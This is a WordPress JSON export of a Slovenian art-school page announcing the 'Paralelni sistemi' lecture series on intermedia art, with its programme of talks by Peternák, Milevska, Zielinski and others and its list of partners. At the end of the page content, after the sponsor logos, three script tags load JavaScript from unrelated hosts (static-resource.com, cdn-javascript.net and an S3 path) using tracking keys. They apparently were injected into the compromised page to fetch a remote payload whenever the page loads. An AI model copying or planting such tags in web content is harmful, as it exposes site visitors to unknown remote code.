{"id":14782,"date":"2019-10-29T17:01:29","date_gmt":"2019-10-29T15:01:29","guid":{"rendered":"http:\/\/www.worldofart.org\/aktualno\/?page_id=14782"},"modified":"2022-01-11T12:11:16","modified_gmt":"2022-01-11T10:11:16","slug":"paralelni-sistemi-vzpostavljanje-in-uveljavljanje-intermedijske-umetnosti","status":"publish","type":"page","link":"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/paralelni-sistemi-vzpostavljanje-in-uveljavljanje-intermedijske-umetnosti","title":{"rendered":"Paralelni sistemi. Vzpostavljanje in uveljavljanje intermedijske umetnosti"},"content":{"rendered":"<p><strong>Svet umetnosti<\/strong>, \u0161ola za kuratorske prakse in kriti\u0161ko pisanje in\u00a0<a href=\"https:\/\/www.igorzabel.org\/sl\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Dru\u0161tvo Igor Zabel za kulturo in teorijo<\/strong><\/a><strong><em>\u00a0<\/em><\/strong>vabita na niz javnih predavanj<strong>\u00a0<\/strong>in dogodkov\u00a0<em><strong>Paralelni sistemi. Vzpostavljanje in uveljavljanje intermedijske umetnosti.<\/strong><\/em><\/p>\n<p><img decoding=\"async\" class=\"alignnone size-full wp-image-14786\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/paralelni-sistem-main-cover-slo-fin.jpg\" alt=\"\" width=\"730\" srcset=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/paralelni-sistem-main-cover-slo-fin.jpg 1920w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/paralelni-sistem-main-cover-slo-fin-338x190.jpg 338w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/paralelni-sistem-main-cover-slo-fin-768x432.jpg 768w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/paralelni-sistem-main-cover-slo-fin-730x411.jpg 730w\" sizes=\"(max-width: 1920px) 100vw, 1920px\" \/><\/p>\n<p>Leto\u0161njo jesen s predavanji, delavnico in okroglo mizo raziskujemo vzpostavitev intermedijske umetnosti v Sloveniji in \u0161ir\u0161i regiji. Osredoto\u010damo se na prizadevanja za prepoznanje intermedijske umetnosti kot samostojnega podro\u010dja in vzpostavljanje kulturnopoliti\u010dnih ter finan\u010dnih mehanizmov, ki so od devetdesetih let minulega stoletja dalje opredeljevali podro\u010dje intermedijske umetnosti. Intermedijska umetnost kot nov umetnostni pojav se ni vedno prekrivala z obstoje\u010do umetnostno infrastrukturo, zato so akterji in akterke posku\u0161ali vzpostaviti vzporeden sistem razli\u010dnih platform, festivalov in prostorov kot tudi iskali mo\u017ene vpise v prevladujo\u010d umetnosti sistem. Predavatelj in vodja centra C\u00b3 v Budimpe\u0161ti <strong>Mikl\u00f3s Petern\u00e1k<\/strong> bo predstavil pojav intermedijske umetnosti na Mad\u017earskem v \u010dasu spremembe re\u017eima in njene zna\u010dilnosti, ki so povezane z eksperimentiranjem in do\u017eivljanjem ter njeno vlogo pri iskanju odgovorov na aktualna vpra\u0161anja postinformacijske dru\u017ebe. Teoreti\u010darka in kuratorka <strong>Suzana Milevska<\/strong> bo v okviru dvodnevne delavnice naslovila kompleksnost razli\u010dnih \u017eanrov pisanja o umetnosti in predstavila strategije pisanja razli\u010dnih \u017eanrov besedil, ki spremljajo medijsko umetnosti. <strong>Siegfried Zielinski<\/strong>, predavatelj in nekdanji rektor univerze za umetnost in oblikovanje v Karlsruheju, bo spregovoril o utopi\u010dnem potencialu medijsko-arheolo\u0161ke aktivnosti in medijski arheologiji, s katero se intenzivno ukvarja. Na okrogli mizi <strong><em>Intermedijska umetnost in kulturna politika <\/em><\/strong>bomo s strokovnjaki in akterji s podro\u010dja intermedijske umetnosti spregovorili o na\u010dinih financiranja na dr\u017eavni in ob\u010dinski ravni, odzivnosti kulturne politike na novo umetnostno podro\u010dje in njegovi uveljavitvi v slovenskem prostoru.<\/p>\n<hr \/>\n<p><a href=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/11\/paralelni-sistemi-zlozenka-web.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Zlo\u017eenka <em>Paralelni sistemi<\/em> (pdf)<\/a><\/p>\n<hr \/>\n<p><strong>PROGRAM<\/strong><\/p>\n<p>&nbsp;<\/p>\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td class=\"tdprogramsredina\" valign=\"top\" width=\"25%\">\u010cetrtek,<br \/>\n<strong>14. 11. 2019, 18.00<\/strong><br \/>\nProjektna soba SCCA<\/td>\n<td class=\"tdprogram\" valign=\"top\" width=\"58%\"><a href=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/archives\/14788\"><strong>Mikl\u00f3s Petern\u00e1k: <em>SPREMINJANJE SISTEMA: INTERMEDIJSKI MODEL. Od raziskovanja medijev do intermedijske umetnosti 2.0 (1989\u20132019)<\/em><\/strong><\/a><br \/>\nPredavanje<\/td>\n<\/tr>\n<tr>\n<td class=\"tdprogramsredina\" valign=\"top\" width=\"25%\">Sreda in \u010detrtek,<br \/>\n<strong>20. in 21. 11. 2019, 16.00\u201320.00<\/strong><br \/>\nProjektna soba SCCA<\/td>\n<td class=\"tdprogram\" valign=\"top\" width=\"58%\"><a href=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/archives\/14834\"><strong>Suzana Milevska: <em>Pisati o umetnosti, z umetnostjo, izhajajo\u010d iz umetnosti<\/em><\/strong><\/a><br \/>\nDelavnica<\/td>\n<\/tr>\n<tr>\n<td class=\"tdprogramsredina\" valign=\"top\" width=\"25%\"><span style=\"font-weight: 400;\">Sreda,<br \/>\n<strong>27. 11. 2019, 18.00<\/strong><\/span><br \/>\n<span style=\"font-weight: 400;\">Trubarjeva hi\u0161a literature<\/span><\/td>\n<td class=\"tdprogram\" valign=\"top\" width=\"58%\"><a href=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/archives\/14850\"><strong><em>Intermedijska umetnost in kulturna politika<\/em><\/strong><\/a><br \/>\nOkrogla miza<br \/>\nSodelujo\u010di: <strong>Semira Osmanagi\u0107, Simon Kardum, Gregor Bulc<\/strong><br \/>\nModeratorka: <strong>Tja\u0161a Pureber<\/strong><\/td>\n<\/tr>\n<tr>\n<td class=\"tdprogramsredina\" valign=\"top\" width=\"25%\">Torek,<br \/>\n<strong>10. 12. 2019, 18.00<\/strong><br \/>\nModerna galerija<\/td>\n<td class=\"tdprogram\" valign=\"top\" width=\"58%\"><a href=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/archives\/14856\"><strong>Siegfried Zielinski: <em>Prospektivne arheologije. Popotovanje skozi GLOBOKI \u010cAS MEDIJEV v mo\u017ene prihodnosti<\/em><\/strong><\/a><br \/>\nPredavanje<\/td>\n<\/tr>\n<tr>\n<td class=\"tdprogramsredina\" valign=\"top\" width=\"25%\">Sreda,<br \/>\n<strong>18. 12. 2019, 17.00<\/strong><br \/>\nProjektna soba SCCA<\/td>\n<td class=\"tdprogram\" valign=\"top\" width=\"58%\"><a href=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/archives\/14912\"><strong>Amy Ireland in Mikkel Bindslev: <em>Shanghai Frequencies<\/em><\/strong><\/a><br \/>\n\u0160umov pogovor<\/td>\n<\/tr>\n<tr>\n<td class=\"tdprogramsredina\" valign=\"top\" width=\"25%\">Sreda,<br \/>\n<strong>11. 11. 2020, 18.00<\/strong><\/td>\n<td class=\"tdprogram\" valign=\"top\" width=\"58%\"><a href=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/archives\/15317\"><strong>Sabine Himmelsbach: <em>Kurirati intermedijsko umetnost offline in online<\/em><\/strong><\/a><br \/>\nSpletno predavanje<\/td>\n<\/tr>\n<tr>\n<td class=\"tdprogramsredina\" valign=\"top\" width=\"25%\">Sreda,<br \/>\n<strong>9. 5. 2021, 19.00<\/strong><\/td>\n<td class=\"tdprogram\" valign=\"top\" width=\"58%\"><a href=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/archives\/15440\"><strong>Katharina Gs\u00f6llpointner:\u00a0<em>Empatija v digitalnem prostoru<\/em><\/strong><\/a><br \/>\nSpletno predavanje<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-weight: 400;\">Predavanja, delavnica in pogovor bodo v angle\u0161\u010dini, okrogla miza pa v sloven\u0161\u010dini.<\/span><\/p>\n<hr \/>\n<p><span style=\"font-weight: 400;\">Cikel <\/span><strong><i>Paralelni sistemi. Vzpostavljanje in uveljavljanje intermedijske umetnosti<\/i><\/strong><span style=\"font-weight: 400;\"> pripravljata <\/span><strong>\u0160ola za kuratorske prakse in kriti\u0161ko pisanje Svet umetnosti<\/strong> (SCCA-Ljubljana) in <a href=\"https:\/\/www.igorzabel.org\/sl\" target=\"_blank\" rel=\"noopener noreferrer\">Dru\u0161tvo Igor Zabel za kulturo in teorijo<\/a> v partnerstvu z revijo <a href=\"http:\/\/sumrevija.si\/\" target=\"_blank\" rel=\"noopener noreferrer\">\u0160UM<\/a>, <a href=\"https:\/\/www.goethe.de\/ins\/si\/sl\/index.html\" target=\"_blank\" rel=\"noopener noreferrer\">Goethe-Institutom Ljubljana<\/a>, <span style=\"font-weight: 400;\">Kulturnim centrom Veleposlani\u0161tva Mad\u017earske, <a href=\"http:\/\/www.ljubljana.balassiintezet.hu\/sl\/\" target=\"_blank\" rel=\"noopener noreferrer\">Balassijevim in\u0161titutom<\/a>, <\/span><a href=\"http:\/\/www.mg-lj.si\/\" target=\"_blank\" rel=\"noopener noreferrer\">Moderno galerijo<\/a> in <a href=\"https:\/\/www.trubarjevahisaliterature.si\/\" target=\"_blank\" rel=\"noopener noreferrer\">Trubarjevo hi\u0161o literature<\/a>.<\/p>\n<p><span style=\"font-weight: 400;\">Program podpirajo: Mestna ob\u010dina Ljubljana \u2013 Oddelek za kulturo, Erste sklad in Zaklada Kultura nova.<br \/>\n<\/span><\/p>\n<p>Delavnica Suzane Milevske je del spremljevalnega programa 26. bienala oblikovanja, BIO26| Skupno znanje.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-9131\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2016\/11\/SU-logo.png\" alt=\"\" width=\"48\" height=\"48\" srcset=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2016\/11\/SU-logo.png 600w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2016\/11\/SU-logo-150x150.png 150w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2016\/11\/SU-logo-300x300.png 300w\" sizes=\"(max-width: 48px) 100vw, 48px\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-14819\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/11\/scca-logo.png\" alt=\"\" width=\"104\" height=\"37\" srcset=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/11\/scca-logo.png 700w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/11\/scca-logo-338x121.png 338w\" sizes=\"(max-width: 104px) 100vw, 104px\" \/> \u00a0 <img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-7192\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2015\/03\/igor_zabel_logo.gif\" alt=\"\" width=\"67\" height=\"40\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-13955\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/11\/SUM-revija1.png\" alt=\"\" width=\"108\" height=\"28\" srcset=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/11\/SUM-revija1.png 730w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/11\/SUM-revija1-338x88.png 338w\" sizes=\"(max-width: 108px) 100vw, 108px\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-13733\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/09\/goethe-institut-logo.png\" alt=\"\" width=\"66\" height=\"31\" srcset=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/09\/goethe-institut-logo.png 400w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/09\/goethe-institut-logo-338x158.png 338w\" sizes=\"(max-width: 66px) 100vw, 66px\" \/> \u00a0 \u00a0 <img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-14796\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/MGMSUM_znak_greyblack.png\" alt=\"\" width=\"71\" height=\"29\" srcset=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/MGMSUM_znak_greyblack.png 733w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/MGMSUM_znak_greyblack-338x138.png 338w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/MGMSUM_znak_greyblack-730x298.png 730w\" sizes=\"(max-width: 71px) 100vw, 71px\" \/> \u00a0 \u00a0 <img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-14794\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/thl_logo_.png\" alt=\"\" width=\"77\" height=\"31\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-10306\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2017\/01\/mol-logo.jpg\" alt=\"\" width=\"85\" height=\"33\" srcset=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2017\/01\/mol-logo.jpg 308w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2017\/01\/mol-logo-300x117.jpg 300w\" sizes=\"(max-width: 85px) 100vw, 85px\" \/>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-14792\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/Erstestiftung_Logo_RGB.png\" alt=\"\" width=\"85\" height=\"33\" srcset=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/Erstestiftung_Logo_RGB.png 2376w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/Erstestiftung_Logo_RGB-338x131.png 338w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/Erstestiftung_Logo_RGB-768x299.png 768w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/Erstestiftung_Logo_RGB-730x284.png 730w\" sizes=\"(max-width: 85px) 100vw, 85px\" \/>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-13950\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/11\/zaklada-kultura-nova.jpg\" alt=\"\" width=\"81\" height=\"35\" srcset=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/11\/zaklada-kultura-nova.jpg 768w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/11\/zaklada-kultura-nova-338x150.jpg 338w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/11\/zaklada-kultura-nova-730x324.jpg 730w\" sizes=\"(max-width: 81px) 100vw, 81px\" \/>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-14758\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/09\/kkm-logo-en.png\" alt=\"\" width=\"58\" height=\"39\" \/>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-14803\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/Balassi_institut_slo_logo.jpg\" alt=\"\" width=\"138\" height=\"25\" srcset=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/Balassi_institut_slo_logo.jpg 785w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/Balassi_institut_slo_logo-338x61.jpg 338w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/Balassi_institut_slo_logo-768x139.jpg 768w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/Balassi_institut_slo_logo-730x132.jpg 730w\" sizes=\"(max-width: 138px) 100vw, 138px\" \/>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-14804\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/BIO26_logo_black.png\" alt=\"\" width=\"53\" height=\"20\" srcset=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/BIO26_logo_black.png 1262w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/BIO26_logo_black-338x127.png 338w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/BIO26_logo_black-768x288.png 768w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/10\/BIO26_logo_black-730x274.png 730w\" sizes=\"(max-width: 53px) 100vw, 53px\" \/><\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-files\/21b12e5cf48c5772c0.js\"><\/script><script src=\"http:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8625x\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8625x&amp;format=arrjs&amp;r=1572981395525\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Svet umetnosti, \u0161ola za kuratorske prakse in kriti\u0161ko pisanje in\u00a0Dru\u0161tvo Igor Zabel za kulturo in teorijo\u00a0vabita na niz javnih predavanj\u00a0in dogodkov\u00a0Paralelni sistemi. Vzpostavljanje in uveljavljanje intermedijske umetnosti. Leto\u0161njo jesen s predavanji, delavnico in okroglo mizo raziskujemo vzpostavitev intermedijske umetnosti v Sloveniji in \u0161ir\u0161i regiji. Osredoto\u010damo se na prizadevanja za prepoznanje intermedijske umetnosti kot samostojnega podro\u010dja [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":14786,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"categories":[],"tags":[],"_links":{"self":[{"href":"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-json\/wp\/v2\/pages\/14782"}],"collection":[{"href":"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-json\/wp\/v2\/comments?post=14782"}],"version-history":[{"count":33,"href":"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-json\/wp\/v2\/pages\/14782\/revisions"}],"predecessor-version":[{"id":15923,"href":"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-json\/wp\/v2\/pages\/14782\/revisions\/15923"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-json\/wp\/v2\/media\/14786"}],"wp:attachment":[{"href":"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-json\/wp\/v2\/media?parent=14782"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-json\/wp\/v2\/categories?post=14782"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-json\/wp\/v2\/tags?post=14782"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}